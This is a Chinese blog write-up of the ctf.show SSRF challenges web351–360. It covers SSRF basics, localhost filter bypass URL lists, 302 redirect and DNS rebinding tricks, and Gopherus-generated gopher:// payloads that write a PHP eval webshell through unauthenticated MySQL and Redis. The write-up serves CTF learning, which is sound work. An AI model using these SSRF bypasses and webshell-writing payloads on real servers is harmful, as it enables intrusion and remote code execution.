SSRF基础以及ctf.show的SSRF(web351-web360)

已于 2022-09-30 16:12:50 修改
阅读量586 收藏
点赞数
文章标签: web3 服务器 网络
于 2022-09-30 16:11:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63303407/article/details/126620702
版权

web351

SSRF基础

SSRF是一种有攻击者构造形成由服务daunt发起请求的一个安全漏洞.一般情况下,SSRF攻击的目标是从外网无法访问的内部系统.(正是因为他是有服务器端发起的,所以它能够请求到与他相连而与外网隔离的内部系统)

相关函数和类

  • file_get_contents():将整个文件或一个url所指向的文件读入一个字符串中
  • readfile():输出一个文件的内容
  • fsockopen():打开一个网络连接或者一个Unix套接字连接
  • curl_exec():初始化一个新的会话,返回一个cURL句柄,供curl_setopt() curl_exec() 和 curl_close()函数使用
  • fopen():打开一个文件或者url
  • PHP原生类soapclient在触发反序列化时可导致ssrf

相关协议

  • file协议:在有回显的情况下,利用file协议可以读取任意文件的内容
  • dict协议:泄露安装软件版本信息,查看端口,操作内网redis服务等
  • gopher协议:gophar支持发出get post请求.可以先截获get请求包和post请求包,在构造成符合gopher协议的请求.gophar协议是ssrf利用中一个最强大的协议(俗称万能协议).可以用于反弹shell
  • http/s协议:探测主机内网主机存活

利用方式

  1. 让服务端去访问相应的网址
  2. 让服务端去访问自己所处内网的一些指纹文件来判断是否存在相应的cms
  3. 可以使用file dict gopher ftp协议进行请求访问相应的文件
  4. 攻击内网web应用(可以向内部任意主机的任意端口发送精心构造的数据包{payload})
  5. 攻击内网应用程序(利用跨协议通讯技术)
  6. 判断内网主机是否存活:方法是访问看是否有端口开放
  7. Dos攻击(请求大文件,始终保持连接keep-alive always)

题目

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$ch=curl_init($url);#初始化一个curl会话 并将CURLOPT_URL选项将会被设置成这个值,
curl_setopt($ch, CURLOPT_HEADER, 0);#设置一个curl传输选项 CURLOPT_HEADER启用时会将头文件的信息作为数据输出流输出
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);#CURLOPT_RETURNTRANSFER将curl_exec()获取的信息以文件流的形式返回,而不是直接输出
$result=curl_exec($ch);#执行给定的curl会话
curl_close($ch);#关闭一个curl会话
echo ($result);
?>

先访问下index.php文件试试

image-20220328182412744

image-20220328182419504

扫了下目录

image-20220328182457772

也可以使用file协议读取文件,但是怎么得到网站路径呢(我不会)

image-20220328184035147

url=http://0/flag.php
url=http://0.0.0.0/flag.php
url=http://127.1/flag.php
url=http://2130706433/flag.php
url=http://017700000001/flag.php
url=http://0b1111111000000000000000000000001/flag.php 		不行
url=http://0x7f.0.0.1/flag.php
url=http://0177.0.0.1/flag.php
url=http://localhost/flag.php
url=http://127.127.127.127/flag.php

web352

 <?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){#如果scheme是http或者scheme
if(!preg_match('/localhost|127.0.0/')){#如果没有匹配到localhost或者127.0.0.1
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    die('hacker');
}
}
else{
    die('hacker');
}
?> hacker

parse_url函数返回

Array (
[scheme] => http
[host] => hostname
[user] => username
[pass] => password
[path] => /path
[query] => arg=value
[fragment] => anchor
)

url=http://0/flag.php
url=http://0.0.0.0/flag.php
url=http://127.1/flag.php
url=http://2130706433/flag.php
url=http://017700000001/flag.php
url=http://0b1111111000000000000000000000001/flag.php 		不行
url=http://0x7f.0.0.1/flag.php
url=http://0177.0.0.1/flag.php
url=http://localhost/flag.php
url=http://127.127.127.127/flag.php

image-20220331164446314

web353

 <?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
if(!preg_match('/localhost|127\.0\.|\。/i', $url)){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    die('hacker');
}
}
else{
    die('hacker');
}
?> hacker

url=http://0/flag.php
url=http://0.0.0.0/flag.php
url=http://127.1/flag.php
url=http://2130706433/flag.php
url=http://017700000001/flag.php
url=http://0b1111111000000000000000000000001/flag.php 		不行
url=http://0x7f.0.0.1/flag.php
url=http://0177.0.0.1/flag.php
url=http://localhost/flag.php	不行
url=http://127.127.127.127/flag.php

web354

302跳转

 <?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
if(!preg_match('/localhost|1|0|。/i', $url)){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    die('hacker');
}
}
else{
    die('hacker');
}
?> hacker

ssrf.php

<?php header("Location: http://127.0.0.1/flag.php");

image-20220409213546208

访问这个文件就跳转,不过我没有公网ip

image-20220409215541568

注册->添加dns rebinding->复制identifier->前面加个r

image-20220409215639292

现成的A记录是127.0.0.1的网站

url=http://sudo.cc/flag.php

自己的域名A记录设为了127.0.0.1

替换一下localhost

with open('Expectedsolution.txt','w') as f:
    for i in range(128,65537):    
        tmp=chr(i)    
        try:        
            res = tmp.encode('idna').decode('utf-8')        
            if("-") in res:            
                continue
            f.write("U:{}    A:{}      ascii:{} ".format(tmp, res, i) + '\n')       
            print("U:{}    A:{}      ascii:{} ".format(tmp, res, i))    
        except:        
            pass
f.close()

替换字符a为£Á:即loc£Álhost

web355

 <?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
$host=$x['host'];
if((strlen($host)<=5)){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    die('hacker');
}
}
else{
    die('hacker');
}
?> hacker

设置了$host<5的限制,随便来个利用127.0.0.1=127.1刚好是5位

url=http://0/flag.php
url=http://127.1/flag.php

web356

 <?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
$host=$x['host'];
if((strlen($host)<=3)){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    die('hacker');
}
}
else{
    die('hacker');
}
?> hacker

url=http://0/flag.php

web357

 <?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
$ip = gethostbyname($x['host']);
echo '</br>'.$ip.'</br>';
if(!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {
    die('ip!');
}


echo file_get_contents($_POST['url']);
}
else{
    die('scheme');
}
?> scheme

FILTER_FLAG_IPV4 - 要求值是合法的 IPv4 IP(比如 255.255.255.255)
FILTER_FLAG_IPV6 - 要求值是合法的 IPv6 IP(比如 2001:0db8:85a3:08d3:1319:8a2e:0370:7334)
FILTER_FLAG_NO_PRIV_RANGE - 要求值是 RFC 指定的私域 IP (比如 192.168.0.1)
FILTER_FLAG_NO_RES_RANGE - 要求值不在保留的 IP 范围内。该标志接受 IPV4 和 IPV6 值

不能有私有地址

web358

 <?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if(preg_match('/^http:\/\/ctf\..*show$/i',$url)){
    echo file_get_contents($url);
}


url=http://ctf.@127.0.0.1/flag.php?.show

web359

ssrf打无密码mysql gopherus工具

image-20220409231917551

image-20220409232024479

发现访问了这个地址Gopherus

gopherus --exploit mysql
root   
select "<?php eval($_POST['zf']);?>" INTO OUTFILE '/var/www/html/zf.php'

image-20220410141657582

image-20220410141702883

gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%49%00%00%00%03%73%65%6c%65%63%74%20%22%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%50%4f%53%54%5b%27%7a%66%27%5d%29%3b%3f%3e%22%20%49%4e%54%4f%20%4f%55%54%46%49%4c%45%20%27%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%7a%66%2e%70%68%70%27%01%00%00%00%01

在3306/_后面的一串字符串需要再进行一次url关键字符编码才可以使用

image-20220410141733071

u=1&returl=gopher://127.0.0.1:3306/_%25a3%2500%2500%2501%2585%25a6%25ff%2501%2500%2500%2500%2501%2521%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2572%256f%256f%2574%2500%2500%256d%2579%2573%2571%256c%255f%256e%2561%2574%2569%2576%2565%255f%2570%2561%2573%2573%2577%256f%2572%2564%2500%2566%2503%255f%256f%2573%2505%254c%2569%256e%2575%2578%250c%255f%2563%256c%2569%2565%256e%2574%255f%256e%2561%256d%2565%2508%256c%2569%2562%256d%2579%2573%2571%256c%2504%255f%2570%2569%2564%2505%2532%2537%2532%2535%2535%250f%255f%2563%256c%2569%2565%256e%2574%255f%2576%2565%2572%2573%2569%256f%256e%2506%2535%252e%2537%252e%2532%2532%2509%255f%2570%256c%2561%2574%2566%256f%2572%256d%2506%2578%2538%2536%255f%2536%2534%250c%2570%2572%256f%2567%2572%2561%256d%255f%256e%2561%256d%2565%2505%256d%2579%2573%2571%256c%2549%2500%2500%2500%2503%2573%2565%256c%2565%2563%2574%2520%2522%253c%253f%2570%2568%2570%2520%2565%2576%2561%256c%2528%2524%255f%2550%254f%2553%2554%255b%2527%257a%2566%2527%255d%2529%253b%253f%253e%2522%2520%2549%254e%2554%254f%2520%254f%2555%2554%2546%2549%254c%2545%2520%2527%252f%2576%2561%2572%252f%2577%2577%2577%252f%2568%2574%256d%256c%252f%257a%2566%252e%2570%2568%2570%2527%2501%2500%2500%2500%2501

image-20220410141757662

image-20220410141806054

web360

ssrf打无密码redis gopherus工具

 <?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
?> 

gopherus --exploit redis
php

<?php eval($_POST['zf']);?>

image-20220410144704672

gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2431%0D%0A%0A%0A%3C%3Fphp%20eval%28%24_POST%5B%27zf%27%5D%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A

url=gopher://127.0.0.1:6379/_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252431%250D%250A%250A%250A%253C%253Fphp%2520eval%2528%2524_POST%255B%2527zf%2527%255D%2529%253B%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252413%250D%250A%2Fvar%2Fwww%2Fhtml%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A

image-20220410144756321

image-20220410144816907

wanan0red
关注
CTF ssrf 01 ssrf简介
aaashen的专栏
09-29 1543
CTF ssrf 01 ssrf简介简介漏洞危害SSRF漏洞相关的函数和协议Php中产生ssrf漏洞的函数curl_exec漏洞代码示例Curl可利用协议与漏洞SSRF漏洞定位判断漏洞存在的方法容易出现SSRF的地方 简介 SSRF (server-site request forgery,服务端请求伪造) 是一种构造请求, 由服务端发起请求的安全漏洞。 一般情况下,攻击者无法直接访问到内网资源,但如果服务器存在SSRF漏洞,攻击者就可以利用SSRF攻击访问外网无法访问的内网资源。 SSRF漏洞形成的原因
CTF之web学习记录 -- SSRF
lifanxin的博客
06-29 1966
SSRF概述SSRF原理SSRF漏洞修复一道例题总结 概述   SSRF(Server-Side Request Forgery)服务器端请求伪造,是一种由攻击者构造请求,服务器端发起请求的安全漏洞。当然之所以要这样曲折,是因为SSRF的目标一般是外网无法访问的内部系统,所以需要用服务器端发送。 SSRF原理   SSRF形成的原因在于服务器端提供了从其它服务器应用获取数据的功能且没有对目标地址做过滤和限制。通过该漏洞我们可以攻击内网的服务器,获取相应的资源信息,利用file协议读取内部网络文件等。   如
ctfshow--ssrf
ing_end的博客
04-23 3957
SSRF概述及其危害 *SSRF概述 ​ 强制服务器发送一个攻击者的请求 ​ 互联网上的很多web应用提供了从其他服务器(也可以是本地)获取数据的功能。使用用户指定的URL,web应用可以获取图片(载入图片)、文件资源(下载或读取)。如下图所示,百度提供识图功能。如果链接可以访问任意请求,则存在ssrf漏洞 ​ 用户可以从本地或者URL的方式获取图片资源,交给百度识图处理。如果提交的是URL地址,该应用就会通过URL寻找图片资源。如果web 应用开放了类似于百度识图这样的功能,并且对用户提供的URL和远端
CTFSSRF漏洞详解
最新发布
star3119391396的博客
08-21 912
Protocol,简单文件传输协议)是一种简单的基于lockstep机制的文件传输协议,它允许客户端从远程主机获取文件或将文件上传至远程主机。然后把它用一个随即文件名保存在硬盘上,并展示给用户。Transfer Protocol),这是一种与SSH打包在一起的单独协议,它运行在安全连接上,并以类似的方式进行工作。在PHP的parse_url中会识别www.ccc.com,而libcurl则识别为www.bbb.com。file:/// 从文件系统中获取文件内容,如,file:///etc/passwd。
ctfshow ssrf篇
jie_a的博客
07-03 421
SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统) web351-353 前两个无过滤 url=http://127.0.0.1/flag.php 第三个 payload:url=http://0x7F000001/flag.php 也可以用地址转换进制 转换 web354 Y4师傅
ctfshow web入门 ssrf web351~web360
qq_62989306的博客
09-13 1151
ssrf之127.0.0.1绕过、域名指向、302跳转、DNS重定向、gopher打mysql、redis……
CTFshow SSRF(web351-360)
Kradress的博客
03-17 693
表示不允许私有IP地址(例如,10.0.0.0/8,172.16.0.0/12和192.168.0.0/16),而。后面要进行url编码,因为curl还会进行一次url解码。后面要进行url编码,因为curl还会进行一次url解码。显示网页内容,说明存在SSRF漏洞,那应该就是用。因为不能用私网,所以这题还是可以用。题目hint:打无密码的mysql。发现是一个登录框,抓个包看看,输入。,用于过滤和验证输入的IP地址。,这里可以用进制转换绕过。的返回结果,直接写马。的返回结果,直接写马。
CTF-WEB入门DOC-2019版1
08-03
总之,CTF-WEB入门DOC-2019版1提供了一个系统性的学习路线图,涵盖Web安全的基础知识、实践平台、学习资源以及进阶技能,为有志于网络安全特别是Web安全领域的学习者提供了宝贵的指导。通过不断学习和实践,你可以...
CTFSHOW】web入门SSRF
7ruth0hn的博客
06-21 1186
CTFSHOW web入门SSRF 发现学习渗透和ctf对xss,ssrf,csrf,ssti都有挺高要求的,一直没怎么系统刷过题。今天学习学习,补补之前落下的债(* ̄3 ̄)╭ web351 扫描网站发现存在flag.php文件,通过分析和测试发现需要服务器本地访问,故使用传入127.0.0.1/flag.php web352 payload: web353 过滤代码: if($x['scheme']==='http'||$x['scheme']==='https'){ if(!preg_
CTFSHOW WEB题目
qq_45655564的博客
08-09 2947
web签到题 网页原代码中发现这个,base64解码就是flag web2 这道题目就是最简单的SQL注入了 发现万能密码可以成功。 于是后台查询语句猜测是select ‘column’ from ‘table’ where username=’$_POST[]’&password=’$_POST[]’ limit 1,1 自己猜的熬,不一定是完全正确的。 这样的话直接闭合前面的单引号就行了。 之后就是 123’ or 1=1 union select 1,2,3# 123’ or 1=1 un
浅谈SSRF漏洞之基础
weixin_39664643的博客
11-19 1192
SSRF漏洞利用之 文件读取、端口扫描
CTFshow——SSRF
D.MIND 的博客
02-25 1077
文章目录web351——web352、353——黑名单过滤web354——DNS-Rebinding攻击绕过web355—— web351—— <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $resul
PHP FILTER_VALIDATE_IP 过滤器
weixin_34403693的博客
06-25 391
FILTER_VALIDATE_IP 过滤器把值作为 IP 进行验证,用于验证 IP 是否合法,支持 IPV6 验证 例子 <?php $ip = "192.168.0.1"; if(!filter_var($ip, FILTER_VALIDATE_IP)) { echo "IP is not valid"; } else { echo "IP is v...
ctfshow SSRF web351-web360 wp
mumuzi的博客
02-10 3854
WDNMD(We Did Nothing Means Done)
ctfshow SSRF web351~360
shinygod的博客
09-25 1315
SSRF练习和学习
ctfshow SSRF专题
会下雪的晴天
01-02 932
title: ctfshow SSRF专题 date: 2020-12-30 11:49:30 categories: ctfshow 新博客地址:https://yq1ng.github.io/ 随缘更 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统) web351 web.
ctfshow-web351(SSRF)
m0_62094846的博客
06-27 240
flag存在于flag.php中,但是不能用当前的网址,试试本地网址(127.0.0.1)
ctfshow web入门 ssrf web351--web360
2301_81040377的博客
05-14 375
我测试了一下会显示504,我以为是环境的问题就没有整了,结果问了大菜鸡师傅,没问题,直接访问shell.php就行,这个故事告诉我们还是要多尝试。127.0.0.0/8是一个环回地址网段,从127.0.0.1 ~ 127.255.255.254都表示localhost。这道题我先是直接想访问flag.php,后来回显说必须是本地,于是payload。ip地址还可以通过表示成其他进制的形式访问,IP地址二进制、十进制、十六进制互换。然后访问shell.php进行rce即可。用服务器DNS重定向。
CTFSHOW-web351-360
qq_52579508的博客
08-01 376
这段代码就是简单的获取一个网页并输出直接post。
HECTF2023 Web挑战心得:身份验证与SSRF攻防
这两道题目展示了参赛者在处理web CTF挑战时,如何运用网络协议理解、HTTP头操作、cookie管理、SSRF漏洞识别、参数解析以及常见的注入技术(包括盲注),这些都是现代网络安全竞赛中常见的知识点。通过解决这些问题...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值